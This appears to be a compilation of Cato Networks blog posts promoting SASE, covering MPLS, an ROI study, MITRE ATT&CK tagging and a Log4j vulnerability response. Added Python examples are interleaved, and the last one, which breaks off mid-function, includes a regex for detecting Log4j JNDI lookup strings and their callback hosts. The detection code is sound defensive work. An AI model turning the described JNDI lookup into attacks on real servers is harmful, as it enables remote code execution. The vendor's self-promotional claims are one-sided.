Cato pioneered the convergence of networking and security into the cloud. Aligned with Gartner's Secure Access Service Edge (SASE) framework, Cato's vision is to deliver a next generation secure networking architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches based on disjointed point solutions. With Cato, organizations securely and optimally connect any user to any application anywhere on the globe. Our cloud-first architecture enables Cato to rapidly deploy new capabilities and maintain optimum security posture, without any effort from the IT teams. With Cato, your IT organization and your business are ready for whatever comes next.
See the ebook “8 SASE Drivers for Modern Enterprises”.
5 Strategic Projects for Strategic CIOs
The role of the CIO has changed dramatically in the past years. Until now, CIOs had been focusing on ongoing IT management. But today, technology creates new business models and helps achieve business goals. This makes technology the defining pillar of business transformation. CIOs who realize this and identify the right opportunities for strategically leveraging technology can transform their organization.
Let’s look at five strategic projects that can help CIOs drive innovation and generate new revenue streams.
Project #1: Migrating MPLS or SD-WAN to SASE
Many organizations have replaced their MPLS with SD-WAN, or are in the process of doing so. SD-WAN emerged a few decades ago as a cost-effective replacement to MPLS, because it answers MPLS constraints like capacity, cost and lack of flexibility. However, SD-WAN does not provide solutions for modern requirements like security threats, remote work, global performance and cloud-native scalability.
SASE (Secure Access Service Edge) is the next step after SD-WAN. A Gartner-coined term, SASE is the convergence of SD-WAN, network security and additional IT capabilities into a global, cloud-native platform. Compared to SD-WAN and other point solutions, SASE ensures reliability, performance, security and connectivity.
In fact, according to Gartner’s Hype Cycle of Network Security 2020 - by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How CIOs Create Business Value with SASE:
By migrating to SASE, CIOs ensure all employees will always be able to connect via a secure, global and performance optimized network. With SASE, CIOs are also relieved from the complexity and risk of supporting the business with point solutions, which are often outdated.
Project #2: Building Cloud Native Connectivity
Cloud-native infrastructure, platforms and applications provide businesses with flexibility, scalability and customizability. They also increase the speed and efficiency of processes.
Technological advancements have enabled this transition, but it is the growing need for remote accessibility and global connectivity that is accelerating it. On-premises solutions can no longer answer modern business needs for performing business activities.
SASE is a cloud-native technology, providing businesses with all the benefits of the cloud and connecting all edges, branches, users and data centers.
How CIOs Create Business Value with Cloud Native Connectivity
By building cloud native connectivity across all edges, CIOs provide employees with optimized performance, security and accessibility to any required internal or external business application. Cloud readiness also enables agile delivery to customers.
Project #3: Implementing a Full Security Stack in the Cloud
Cyber attacks are becoming increasingly sophisticated and widespread, with the potential to cause more damage. Coupled with the dissolution of network borders, IT and security teams need to rethink their security strategy and solutions.
Existing point security solutions simply cannot keep up with all these changes. In addition, the overhead tax IT and security teams pay for finding, purchasing, managing, integrating and updating various security solutions from numerous vendors is very high.
A converged security solution implements innovative security models, like ZTNA (Zero Trust Network Access), alongside security measures like threat prevention and decryption. In addition, it is updated automatically, to ensure it can protect against known vulnerabilities (CVEs) and zero-day threats.
How CIOs Provide Business Value with Full Stack Cloud Security
By implementing a complete security stack in the cloud, CIOs provide the company’s employees and customers with the confidence that their information is secure and accessible only to authorized users and services. In addition, IT and security teams regain peace of mind to operate with confidence and stress free.
Project #4: Enable Access to All Edges
Working remotely from home, the road or a different office is becoming increasingly popular, and is turning into a working model that is here to stay. In addition, the global distribution of networks has also introduced many new entry points to business systems. But, traditional access capabilities are not designed for these types of connectivity models.
SASE provides dynamic and secure access through global PoPs (Points of Presence). Traffic from remote users, data centers, applications or other edges is automatically detected and sent to the nearest PoP. There, it is authorized and then given access.
How CIOs Provide Business Value with Global Access to All Edges
By providing users with secure access while ensuring first-class performance, CIOs become enablers for business agility and speedy deliveries. The freedom and flexibility to work from anywhere and connect to anywhere power new opportunities for business initiatives. In addition, they provide employees with working conditions fit for modern life and ensure they will not look elsewhere for an employer that enables working remotely.
Project #5: Optimize Routing with Global Connectivity
Businesses today route high volumes of traffic, from globally dispersed employees and other edges. Performance optimization is essential for connectivity and communication so employees can get things done. However, the Internet is too erratic to be relied on, and SD-WAN providers are forced to integrate with third party backbone providers for such optimization.
SASE solutions provide a global backbone and WAN optimization, serving IT and security capabilities to all users and accelerating east-west and northbound traffic to the cloud.
How CIOs Provide Business Value with Optimized Global Connectivity
By ensuring low latency and optimized routing, CIOs are fulfilling a key requirement for business agility. From video streaming to accessing information to transferring data, optimized routing facilitates and powers business activities.
How to Get Started
Looking at this list might be daunting at first. However, all these projects can be achieved through the implementation of SASE. SASE converges network and security point solutions into a single, global, cloud-native platform that enables access from all edges. Therefore, it provides a single and streamlined answer to all network and security needs, now and in the future.
Cato is the world’s first SASE platform. Using the Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
You can read more from the following resources:
Your First 100 Days as CIO: 5 Steps to Success
5 Things SASE Covers that SD-WAN Doesn’t
What is SASE?
The Hybrid Workforce: Planning for the New Working Reality
Pros and Cons of MPLS: Is It Right for Your Network?
MPLS is a reliable routing technique that ensures efficiency and high performance. However, global changes like remote work, mobile connectivity and cloud-based infrastructure require businesses to reconsider their MPLS network strategy. This blog post explains what MPLS is, how it works, MPLS advantages and disadvantages and what to consider next.
What is MPLS?
MPLS (Multiprotocol Label Switching) is a network routing technique that is based on predetermined paths, instead of routers determining the next hop in real time. This enables quicker and more efficient routing, as a router only needs to look at the packet’s label, instead of looking up the destination address in complex routing tables. In addition, using MPLS requires setting up a dedicated connection. It is de facto a private network.
How does MPLS Work?
In MPLS, when a data packet enters the network, it is assigned a data label by the first router in the path. The label predetermines the path the packet needs to follow. It includes a value, as well as additional fields to determine the quality of service required, the position of the label in the stack and time-to-live. Based on this label, the packet is routed to the next router in its path.
The second router that receives the packet then reads this label and uses it to determine the following hop in the network. It also removes the existing label from the packet and adds a new one. This process is repeated until the data packet reaches its destination. The last router in the path removes the label from the data packet.
Since the path is predetermined, the routers only need to read the label and do not need to check the packet’s IP address. This enables faster and more efficient routing.
MPLS routing terms:
Label Edge Router (LER) - the first or last routers that either assign the first data label and determine the path or pop the label off the packet. The first router is also known as Ingress Label Switching Router (Ingress LSR) and the last as Egress LSR.
Label Switching Router (LSR) - the routers along the path that read the labels, switch them and determine the next hop for the packets.
Label Switching Path (LSP) - the path the packets are routed through in the network.
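The label push, swap and pop sequence described above, as an added walk-through that is not code from the original post. It models the three router roles (ingress LER, LSR, egress LER) and encodes the 32-bit label header with the value, traffic class, bottom-of-stack and TTL fields the post mentions (layout as in RFC 3032); the router names, label values and addresses are constructed sample data.

```python
"""MPLS label-switching walk-through (added illustration, not the post's own code).

The ingress LER classifies on the IP destination and pushes a label, each LSR
swaps the label using only its label table, and the egress LER pops it. The
32-bit shim header layout (label 20 bits, traffic class 3 bits, bottom-of-stack
1 bit, TTL 8 bits) follows RFC 3032. Router names, labels and prefixes below
are constructed sample data.
"""
from dataclasses import dataclass, field
import ipaddress


@dataclass
class Label:
    value: int        # 20-bit label value
    tc: int = 0       # 3-bit traffic class (the QoS marking)
    bos: bool = True  # bottom-of-stack flag (position of the label in the stack)
    ttl: int = 64     # 8-bit time-to-live

    def pack(self) -> int:
        """Encode the label as the 32-bit MPLS shim header."""
        if not (0 <= self.value < 1 << 20 and 0 <= self.tc < 8 and 0 <= self.ttl < 256):
            raise ValueError("MPLS header field out of range")
        return (self.value << 12) | (self.tc << 9) | (int(self.bos) << 8) | self.ttl

    @classmethod
    def unpack(cls, word: int) -> "Label":
        """Decode a 32-bit shim header back into its fields."""
        return cls(value=word >> 12, tc=(word >> 9) & 0x7,
                   bos=bool((word >> 8) & 1), ttl=word & 0xFF)


@dataclass
class Packet:
    dst_ip: str
    labels: list = field(default_factory=list)  # label stack, top of stack at index 0
    trace: list = field(default_factory=list)   # (router name, label value on arrival)


@dataclass
class Router:
    name: str
    role: str                                   # "ingress", "lsr" or "egress"
    # ingress: FIB   prefix -> (label value, traffic class, next hop)
    # lsr:     LFIB  incoming label -> (outgoing label, next hop)
    table: dict = field(default_factory=dict)

    def forward(self, pkt: Packet):
        """Process one packet; return the next-hop router name, or None when delivered or dropped."""
        top = pkt.labels[0].value if pkt.labels else None
        pkt.trace.append((self.name, top))
        if self.role == "ingress":
            # Only the ingress LER looks at the IP header: longest-prefix match in its FIB.
            dst = ipaddress.ip_address(pkt.dst_ip)
            matches = [n for n in self.table if dst in ipaddress.ip_network(n)]
            if not matches:
                return None  # no LSP for this destination: dropped
            best = max(matches, key=lambda n: ipaddress.ip_network(n).prefixlen)
            value, tc, next_hop = self.table[best]
            pkt.labels.insert(0, Label(value=value, tc=tc, bos=True, ttl=64))
            return next_hop
        if self.role == "lsr":
            # An LSR reads only the label, decrements TTL, swaps the label and forwards.
            if top not in self.table:
                return None  # unknown label: dropped
            out_value, next_hop = self.table[top]
            old = pkt.labels[0]
            if old.ttl <= 1:
                return None  # TTL expired: dropped
            pkt.labels[0] = Label(value=out_value, tc=old.tc, bos=old.bos, ttl=old.ttl - 1)
            return next_hop
        # The egress LER pops the label; the packet leaves the LSP as plain IP.
        if pkt.labels:
            pkt.labels.pop(0)
        return None


def build_sample_network() -> dict:
    """Constructed four-router LSP: PE1 (ingress) -> P1 -> P2 -> PE2 (egress)."""
    return {
        "PE1": Router("PE1", "ingress", {"10.2.0.0/16": (17, 5, "P1"),
                                         "10.2.9.0/24": (42, 0, "P1")}),
        "P1": Router("P1", "lsr", {17: (24, "P2"), 42: (43, "P2")}),
        "P2": Router("P2", "lsr", {24: (31, "PE2"), 43: (44, "PE2")}),
        "PE2": Router("PE2", "egress"),
    }


def send(network: dict, pkt: Packet, start: str = "PE1") -> str:
    """Walk the packet hop by hop along the LSP; return 'delivered' or 'dropped'."""
    current = start
    while current is not None:
        router = network[current]
        current = router.forward(pkt)
        if router.role == "egress":
            return "delivered"
    return "dropped"


if __name__ == "__main__":
    net = build_sample_network()
    p = Packet("10.2.0.7")
    print(send(net, p), p.trace, p.labels)  # labels seen 17 -> 24 -> 31, stack empty at the end
```

The trace shows that only the ingress router ever consults the IP destination; every later hop forwards on the label alone, which is the speed-up the post describes.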
Now let’s look at the advantages and disadvantages of MPLS routing.
MPLS Advantages & Benefits
MPLS provides multiple advantages to network administrators and businesses. These include:
Routing based on labels over a private network ensures that packets will be reliably delivered to their destination. In addition, MPLS enables prioritizing traffic for different types of packets, for example routing real-time, video packets through a lower latency path. This reliability is guaranteed through service level agreements (SLAs), which also ensure the MPLS provider will resolve outages or pay a penalty.
MPLS dedicated infrastructure assures high-quality, low latency and low jitter performance. This ensures efficiency and a good user experience. It is also essential for real-time communication, like voice, video and mission-critical information.
However, there are also disadvantages to MPLS.
MPLS services are expensive, due to their commitment to ensure high bandwidth, high performance and competitive SLAs. Deployments and upgrades of the required private connection can also turn into a resource-intensive process.
MPLS is built for point-to-point connectivity, and not for the cloud. Therefore, the WAN does not have a centralized operations center for reconfiguring locations or deploying new ones and does not enable quick scalability.
Does Not Support All Edges
MPLS cannot be extended to the cloud since it requires its own dedicated infrastructure. Therefore, it is not a good fit for remote users or for connecting to SaaS applications.
MPLS is a trustworthy solution for legacy applications in enterprises. However, the transition to the cloud and remote work require businesses to reconsider their network strategy and implement more cost-effective and efficient solutions. Alternatives like SASE (Secure Access Service Edge) combine all the advantages of MPLS, SD-WAN and more.
To learn more about SASE and to see how it improves your MPLS connectivity, contact us.
Total Economic Impact™ Study: Cato Delivers 246% ROI and $4.33 Million NPV
Cato Networks was founded with a vision to deliver the next generation of networking and network security through a cloud-native architecture that eliminates the complexity, costs, and risks associated with legacy IT approaches. We aim to rapidly deploy new capabilities and maintain a security posture, without any effort from the IT teams.
The question is - are we living up to our goals?
To help us and our potential customers gauge the potential impact and ROI of Cato Networks, we commissioned Forrester Consulting to conduct a Total Economic Impact (TEI) study. To be completely honest, even we were blown away by the success these companies achieved through the Cato SASE Cloud.
The study shows how Cato Networks is helping reduce costs, eliminate overhead, retire old systems, enhance security, improve performance and create higher employee morale.
Some of the key findings Forrester reported were that by using Cato, a composite organization can enjoy:
$4.33 million NPV
Payback in less than 6 months
$3.8 million saved on reduced operation and maintenance
Almost $44,000 saved on reduced time to configure Cato on new sites
$2.2 million saved by retiring systems that Cato replaces
Reduced time and transit cost
This matters because today organizations are struggling with managing security and network services. They have dedicated teams for VPN, internet and WAN, and more, which need to individually manage updates at each network site. This is time-consuming and costly. In the long run, this prevents the business from transforming digitally, maintaining a competitive advantage and delivering the best services they can to their customers.
Let’s dive into some more of these key findings.
Reduced Operation and Maintenance Costs
The study revealed that Cato Networks enables saving $3.8 million in reduced operation and maintenance costs over three years. This objective is extremely important for multiple organization stakeholders, as network and security engineers spend a lot of time managing systems instead of optimizing them.
“Honestly, I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [the previous solution], you need 10 engineers to set it up and 20 engineers to keep it running. With Cato, this all went away. It’s in the dashboard. Within the hour, you understand the idea behind it and then you can just do it.”
- IT manager, motor vehicle parts manufacturer
Reduced Configuration Time
With companies scaling and requiring the flexibility to connect employees and customers from anywhere, setup and configuration time has become an important consideration when choosing a network and security solution. According to the study, Cato Networks saves nearly $44,000 and a huge number of manual hours over three years.
“The other thing that we were driving towards was, because we do mergers, because we do a lot of office moves, [because] we go into different geographies, I wanted an ‘office in a box,’ fire-and-forget sort of management plane separation approach where my team could do a lot with just shipping a box out [and] having a reasonably intelligent individual follow a diagram, plug it in, have it light up in a management portal, and we're in business.”
- Director of technology, advisory, tax and assurance
Savings From Retired Systems
Expensive hardware is a huge pain for IT and security teams. It requires maintenance, upgrades, fixes and integrations with other platforms. By migrating to SASE and retiring old systems, organizations can save $2.2 million with Cato over three years.
“We don’t need to go invest in those other solutions because the Cato transport with the intelligence and the security layer does everything we need it to do.”
- Director of technology, advisory, tax and assurance
According to the report, Cato Networks also provides additional, unquantifiable benefits, like:
Reduced time and transit costs - Saving time and money transporting the equipment to remote sites.
Increased security posture - By ensuring the consistency of security rule sets across the organization.
Better application performance - Enabling practitioners to get their work done faster.
Higher employee morale - According to a director of technology, advisory, tax and assurance: “I know that if I tried to roll it back in my firm, [the employees] would revolt because of the speed it gets. My engineers love it because you ship it, we’ll configure it, it shows up, and we’re off to the races.”
Flexibility - The ability to add new mobile users without the need to add infrastructure and to deploy sites quickly.
Read the Complete Report
You’re welcome to read the complete report to dive deeper into how businesses can digitally transform with Cato Networks. It has all the financial information, more quotes and use cases, and a breakdown of costs and savings to help you gain a more in-depth understanding of Cato Networks’ business impact. Read the complete TEI report.
To speak with an expert about how you can achieve such ROI in your company, contact us.
Why Cato Uses MITRE ATT&CK (And Why You Should Too)
As Indicators of Compromise (IoC) and reactive security continue to be the focus of many blue teams, the world is catching on to the fact that adversaries are getting smarter by the minute and IoCs are getting harder to find and less effective to monitor, giving adversaries the upper hand and keeping them one step ahead.
With the traditional IoC-based approach, the assumption is that whenever adversaries use some specific exploit it will generate some specific data. It could be an HTTP request, a domain name, a known malicious IP, and the like. By looking at information from sources such as application logs, network traffic, and HTTP requests enterprises can detect these IoCs and stop adversaries from compromising their networks.
In 2020 there were about 18,000 new CVEs reported, and in 2021 about 20,000. As this trend continues, the number of IoCs that are discovered becomes unmanageable, and many of them can be modified in small ways to avoid detection. What’s more, as we will show in this blog post, IoCs are not even the full security picture, representing only a small portion of the attacks confronting enterprises. All of which suggests that security professionals need to expand their methods of detecting and stopping attacks.
TTPs: The New Approach to Detecting Attacks
The security community has noticed this trend and has started shifting from IoC-based detection to understanding adversaries’ Tactics, Techniques, and Procedures (TTPs). Having identified TTPs, security vendors can then develop the necessary defenses to mitigate risk.
Many tools have been developed to help understand and map these TTPs; one such tool is MITRE’s ATT&CK framework.
ATT&CK is a collaborative effort involving many security vendors and researchers. The project aims to map adversary TTPs to help create a common language for both red and blue teams.
ATT&CK contains a few different matrices, each covering its own sector. In the enterprise matrix, which is the focus of our work, there are 14 “tactics.” A “tactic” is a general goal that the adversary is trying to accomplish; under each tactic there are several “techniques.” A “technique” is the means the adversary uses to accomplish the tactic: a more technical categorization of what the adversary may do to implement it. Each technique can appear under multiple tactics and can be further divided into sub-techniques. Some tactics can be seen across the network, with Reconnaissance, Initial Access, Execution, and Exfiltration associated with the network’s perimeter.
To better understand the value of ATT&CK, look at “The Pyramid of Pain,” which shows the relationship between the types of indicators you might use to detect an adversary's activities and how hard it is for the adversary to change them once caught. TTPs are the hardest to change, and so cause the most pain to the adversary when detected.
Figure: The Pyramid of Pain. This diagram shows in a simple manner why aiming to identify TTPs can be more beneficial and improve defenses against adversaries than focusing on IoCs.
As enterprises shift from reactive and IoC-based security, which heavily relies on processing IoCs from threat intelligence feeds, to TTP-based security, which requires a proactive approach based on research, enterprise security becomes more challenging. At the same time, TTP-based security brings numerous benefits. These include better visibility into one’s security posture, better understanding of security risks, and an improved understanding of how to expand security capabilities to better defend against real adversaries.
Cato Implements MITRE ATT&CK
Cato has implemented the MITRE ATT&CK methodology of identifying and protecting against TTPs on top of the traditional IoCs. We incorporated this ability into our product by implementing a tagging system that tags each security event with the relevant ATT&CK tactics, techniques, and sub-techniques. This allows customers to visualize and understand what threats they face and what attack flows they are vulnerable to, further enabling them to understand where to improve their insight, and what TTPs their adversaries are using.
Figure: A view of an event that is mapped to ATT&CK in the Cato Cloud.
So, what did implementing a TTP-based approach reveal to us?
As we dove into the details of our signatures, we saw that we could divide them into two main approaches:
IoC-based - Covering a specific vulnerability using well-defined IoCs.
TTP-based - Covering a behavior of an adversary.
We started by looking at our products’ coverage over the entire ATT&CK matrix and trying to understand where we are most vigilant and where we are less so. Our scope was the most common threats we cover (in our customers’ networks), and new threats we covered from the last year.
After going through this process and creating a visualization of our threat protection with the ATT&CK Navigator, we found that Cato Cloud provides protection across all stages of the attack flow with particular strengths in the Initial Access and Execution stages.
Figure: Cato’s protection capabilities mapped onto the ATT&CK matrix. The darker the color, the more vulnerabilities Cato protects against in that technique. (For simplicity, sub-techniques are not shown.)
We should not be satisfied with this data alone: while signature numbers and mappings are an insightful metric, the real insights should be derived from events in the field. So we then examined Cato’s defenses based on the actual events of exploitation attempts in each ATT&CK technique. Our sample covered a two-week period spanning some 1,000 networks.
Figure: Cato’s security events mapped onto the ATT&CK matrix. Again, the darker the color, the more events were found to be using that technique in the last two weeks. Sub-techniques are not shown to keep it simple.
From this mapping, we can see two things.
Most events are from scanning techniques. This is expected, as a single scan can hit many clients over many protocols and generate many events.
We see events from many different techniques and tactics, which means that covering more than just the perimeter of the network does increase security as adversaries can appear in any stage of the attack flow and should never be assumed to exist only in the perimeter.
Putting aside scans, we found that TTP-based signatures identified far more security events than the IoC-based signatures did. Below is a table mapping the percentage of events identified by TTP-based (ATT&CK) and IoC-based approaches over our sampling period. Looking at the table, three techniques represent 87% of all events in the last two weeks. Counting the signatures, we saw that on average 78% of all signatures were IoC-based and only 22% were TTP-based.
Table: Top 3 techniques based on number of events, excluding scans.
But when we looked at the total number of events, we noticed that on average 94% are TTP-based and only 6% are IoC-based. This affirms the effectiveness of our TTP-based approach in focusing on the areas of actual importance to organizations.
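As an added example (not Cato's code), the tagging and aggregation described above, in Python: each event is tagged with the ATT&CK tactic and technique of the signature that produced it, events are summed per technique into an ATT&CK Navigator layer, and the IoC-vs-TTP split is computed once over signatures and once over events, with scans set aside as in the post. The signature catalogue, signature IDs and event counts are constructed; the technique IDs are real ATT&CK enterprise IDs, and the Navigator `versions` block is an assumption that you would match to your own Navigator release.

```python
"""Tag security events with ATT&CK tactics/techniques and aggregate them into
a Navigator layer plus an IoC-vs-TTP split (constructed data, added example)."""
from collections import Counter
from dataclasses import dataclass
import json

ACTIVE_SCANNING = "T1595"  # Reconnaissance technique; excluded when "putting aside scans"


@dataclass(frozen=True)
class Signature:
    sig_id: str      # constructed identifier
    kind: str        # "ioc": one specific exploit/IoC, "ttp": an adversary behaviour
    tactic: str      # ATT&CK tactic the event is tagged with
    technique: str   # ATT&CK technique ID the event is tagged with


# Constructed catalogue: 8 IoC-based and 2 TTP-based signatures.
SIGNATURES = {s.sig_id: s for s in [
    Signature("SIG-0001", "ttp", "Reconnaissance", ACTIVE_SCANNING),
    Signature("SIG-0002", "ttp", "Initial Access", "T1190"),        # Exploit Public-Facing Application
    Signature("SIG-0003", "ioc", "Initial Access", "T1190"),
    Signature("SIG-0004", "ioc", "Initial Access", "T1190"),
    Signature("SIG-0005", "ioc", "Initial Access", "T1190"),
    Signature("SIG-0006", "ioc", "Execution", "T1059"),             # Command and Scripting Interpreter
    Signature("SIG-0007", "ioc", "Execution", "T1059"),
    Signature("SIG-0008", "ioc", "Command and Control", "T1071"),   # Application Layer Protocol
    Signature("SIG-0009", "ioc", "Command and Control", "T1071"),
    Signature("SIG-0010", "ioc", "Exfiltration", "T1048"),          # Exfiltration Over Alternative Protocol
]}

# Constructed events from one sampling window: (signature that fired, hit count).
EVENTS = [("SIG-0001", 500), ("SIG-0002", 120), ("SIG-0003", 4),
          ("SIG-0004", 2), ("SIG-0006", 3), ("SIG-0008", 1)]


def tag_event(sig_id):
    """ATT&CK tags for one event, as a tagging system attaches them."""
    sig = SIGNATURES[sig_id]
    return {"signature": sig_id, "kind": sig.kind,
            "tactic": sig.tactic, "technique": sig.technique}


def technique_counts(events, exclude_scanning=False):
    """Events per technique ID; optionally drop Active Scanning."""
    counts = Counter()
    for sig_id, hits in events:
        tag = tag_event(sig_id)
        if exclude_scanning and tag["technique"] == ACTIVE_SCANNING:
            continue
        counts[tag["technique"]] += hits
    return counts


def _split(pairs):
    """Percentage split of (kind, weight) pairs, rounded to one decimal."""
    total = Counter()
    for kind, weight in pairs:
        total[kind] += weight
    grand = sum(total.values())
    return {k: round(100.0 * total[k] / grand, 1) for k in ("ioc", "ttp")}


def signature_mix(signatures=SIGNATURES):
    """Share of the catalogue that is IoC-based vs TTP-based (counting signatures)."""
    return _split((s.kind, 1) for s in signatures.values())


def event_mix(events=EVENTS, exclude_scanning=True):
    """Share of events produced by IoC-based vs TTP-based signatures."""
    pairs = []
    for sig_id, hits in events:
        tag = tag_event(sig_id)
        if exclude_scanning and tag["technique"] == ACTIVE_SCANNING:
            continue
        pairs.append((tag["kind"], hits))
    return _split(pairs)


def top_techniques(counts, n=3):
    """Top-n techniques as (technique, hits, share of all counted events)."""
    grand = sum(counts.values())
    return [(tid, hits, round(100.0 * hits / grand, 1))
            for tid, hits in counts.most_common(n)]


def navigator_layer(counts, name):
    """ATT&CK Navigator layer whose scores are event counts; the Navigator shades
    higher scores darker, giving the heat map shown in the post.
    Assumption: the 'versions' block matches the Navigator release you load it into."""
    return {
        "name": name,
        "versions": {"layer": "4.4", "navigator": "4.8", "attack": "12"},
        "domain": "enterprise-attack",
        "description": "constructed example data",
        "techniques": [{"techniqueID": tid, "score": hits}
                       for tid, hits in sorted(counts.items())],
    }


if __name__ == "__main__":
    counts = technique_counts(EVENTS, exclude_scanning=True)
    print("signatures:", signature_mix())
    print("events (scans excluded):", event_mix())
    print("top techniques:", top_techniques(counts))
    print(json.dumps(navigator_layer(counts, "events, two weeks"), indent=2))
```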
TTP: Lets You Focus on Quality Not Chase Quantity
Focusing on TTP-based signatures provides a wide angle of protection against unknown threats, and the potential to block 0-days out of the box. On top of 0-days, these signatures cover past threats just as well, giving us a much greater ratio of threats covered per signature.
The IoC-based approach is less valuable, identifying fewer of the threats confronting today’s enterprises. TTP-based signatures save production time by providing better protection for less effort and give us more confidence in our coverage of the ATT&CK Matrix.
What’s more, when covering IoC-based signatures, the focus is on the number of signatures, which does not necessarily result in better security and might even lead to a false sense of one. The bottom line is that one good TTP-based signature can replace 100 IoC-based ones, allowing enterprises to focus on quality of protection without having to chase quantity of threats.
Security or Performance Survey Reveals Confusion about the Promise of SASE
Prioritizing between network security and network performance is hardly a strategy. Yet, Cato’s recent industry survey with non-Cato customers, Security or Performance: How do you Prioritize?, shows that de facto 2045 respondents (split evenly between security and network roles), need to – or believe they’ll have to – choose between security and performance.
Nothing too earth-shattering there; Gartner and other industry leaders have long reached the conclusion that Secure Access Service Edge (SASE) is the suitable network to support both security and performance needs of the digital business. So, unless using SASE, enterprises would inevitably end up having to compromise between the two.
But here’s what is shattering (and particularly confusing): despite the fact that the essence of SASE is never having to choose between security and performance, the 8.5% of respondents already using non-Cato SASE reported an unavoidable need to compromise between them, similar to non-SASE users.
Why the Confusion?
We believe this confusion is due to vendors claiming to provide a SASE platform, where in reality they’re merely offering a portfolio of point solutions, packaged into what they misleadingly call SASE. This state was anticipated by Gartner with an explicit warning that “vendor hype complicates the understanding of the SASE market.”1
A true SASE solution – one that supports both security and performance requirements – must converge SD-WAN and cloud-native security services (FWaaS, SWG, CASB, SDP/ZTNA) in a unified software stack with single-pass processing. This approach boosts performance, increases security, and reduces overall network complexity. Deploying point solutions patched together by so-called SASE vendors doesn’t add up to a real SASE service and can’t offer the enhanced security and optimized performance of a converged platform. Yet this is the SASE service respondents know, hence their confusion is apparent across the survey.
For example, when asked how they react to performance issues with cloud applications, reactions of SASE and non-SASE users were similar. 67% of SASE users would add bandwidth, and 61% of non-SASE users claimed the same. 19% of SASE users would buy a WAN optimization appliance, as 21% of non-SASE users indicated as well.
Evidently SASE users are still suffering from performance issues, and they are forced to add point solutions accordingly. This slows down performance and makes their network more complex and less secure.
Confusion on this topic was even more noticeable among SASE users, where 14% (compared to 9% among non-SASE users) admitted they simply don’t know what to do in case of performance issues. Here are some examples of answers: “Ignore and pray it goes away,” “wait it out – ugh,” “suffer through it,” “don’t know,” and “not sure.”
Improving remote access performance was one of the three main business priorities for all respondents. This makes perfect sense in the new work-from-everywhere reality; and this is one of the most straightforward use cases of SASE. Yet even here, SASE and non-SASE users experience the same problems. 24% of SASE users vs. 27% of non-SASE users complain about poor voice/video quality. Slow application response received the same 50% from both SASE and non-SASE users.
Respondents were also asked to rate the level of confidence in their ability to detect and respond to malware and cyber-attacks. Here too, results across the board were highly comparable. On a scale of 1-10, the average answer for SASE users was 4, and for non-SASE users 3.
Both answers indicate a low level of confidence in dealing with critical situations that can severely impact the network. Although Gartner claims that SASE is the future of network security, for these respondents it’s as if having SASE makes no difference at all.
Making Sense of the Confusion
Respondents already using SASE are confused – and probably disappointed – by their first experience with what was presented to them as a SASE service. Beware of vendors that take an appliance, convert it to a virtual machine, host it in the cloud and call it SASE. Unfortunately, this sounds like trying to deliver a Netflix-like service by stacking thousands of DVD players in the cloud. And, from the very beginning, Gartner advised to “avoid SASE offerings that are stitched together.”
We’re honored that Cato SASE Cloud users present the flip side of this confusion. Aligned with Gartner’s SASE framework, we deliver a converged, cloud-native platform that is globally distributed across 70+ PoPs and covers all edges. As opposed to confused respondents using so-called SASE services, our customers clearly understand the value of SASE and have no dilemma when it comes to security and performance. SASE is not a trade-off between performance and security efficacy, but rather the convergence of both.
“With Cato, we could move people out from our offices to their home, ensuring the same security level, performance.”
“The big difference between Cato and other solutions is the integration of network management and security.”
“Cato provides us with a platform for delivering the networking and security capabilities that help our users increase their productivity.”
“The business is moving very fast. Now with Cato we can match that speed on the network side.”
What about all those non-SASE users? What’s their strategy?
Only 29% indicated they have no plans to deploy SASE.
Clearly, respondents realize the value of SASE and admit that SASE is a must; the question for them isn’t if to migrate, but rather when. This is also in line with Gartner’s prediction that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption.” Let’s hope these respondents are introduced to true SASE offerings and enjoy both security and performance. No compromising…
Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability
On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-44228 has the highest and most critical alert level.
To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from 2.0-beta9 to 2.14.1. It could allow a remote attacker to execute code on a server running Apache Log4j if the system logs an attacker-controlled string value containing a JNDI lookup that points at the attacker's LDAP server.
More simply put, this exploit would allow attackers to execute malicious code on Java applications, and as such, it poses a significant risk due to the prevalence of Log4j across the global software estate.
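As an added example (not Cato's code), two defender-side checks a practitioner would run in the first hours after such a disclosure: a version check against the affected range the post gives (2.0-beta9 through 2.14.1), and a scan of web-server log lines for the plain JNDI lookup string, extracting the callback host so it can be blocked or reported. The log lines, addresses and host names are constructed.

```python
"""Triage helpers for CVE-2021-44228: affected-version test and a log scan for the
plain JNDI lookup string (constructed data, added example)."""
import re
from urllib.parse import unquote

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?")
_STAGE_RANK = {"beta": 0, "rc": 1, None: 2}   # betas < release candidates < final release


def parse_version(text):
    """'2.0-beta9' -> (2,0,0,0,9); '2.0-rc1' -> (2,0,0,1,1); '2.14.1' -> (2,14,1,2,0)."""
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch or 0), _STAGE_RANK[stage], int(num or 0))


FIRST_AFFECTED = parse_version("2.0-beta9")
LAST_AFFECTED = parse_version("2.14.1")


def is_affected_version(text):
    """True when the version lies in the affected range stated in the post."""
    return FIRST_AFFECTED <= parse_version(text) <= LAST_AFFECTED


# Plain form of the lookup: ${jndi:<scheme>:<//host...>}.  Only this plain form is
# matched, so treat hits as a triage aid, not as proof that nothing else got through.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:/{0,2}(?P<host>[^/\s:}]+)",
                      re.IGNORECASE)


def find_jndi_lookups(lines):
    """One dict per lookup found: line number, scheme and callback host."""
    hits = []
    for number, line in enumerate(lines, start=1):
        decoded = unquote(line)            # request paths are often percent-encoded
        for m in _JNDI_RE.finditer(decoded):
            hits.append({"line": number, "scheme": m["scheme"].lower(), "host": m["host"]})
    return hits


def callback_hosts(hits):
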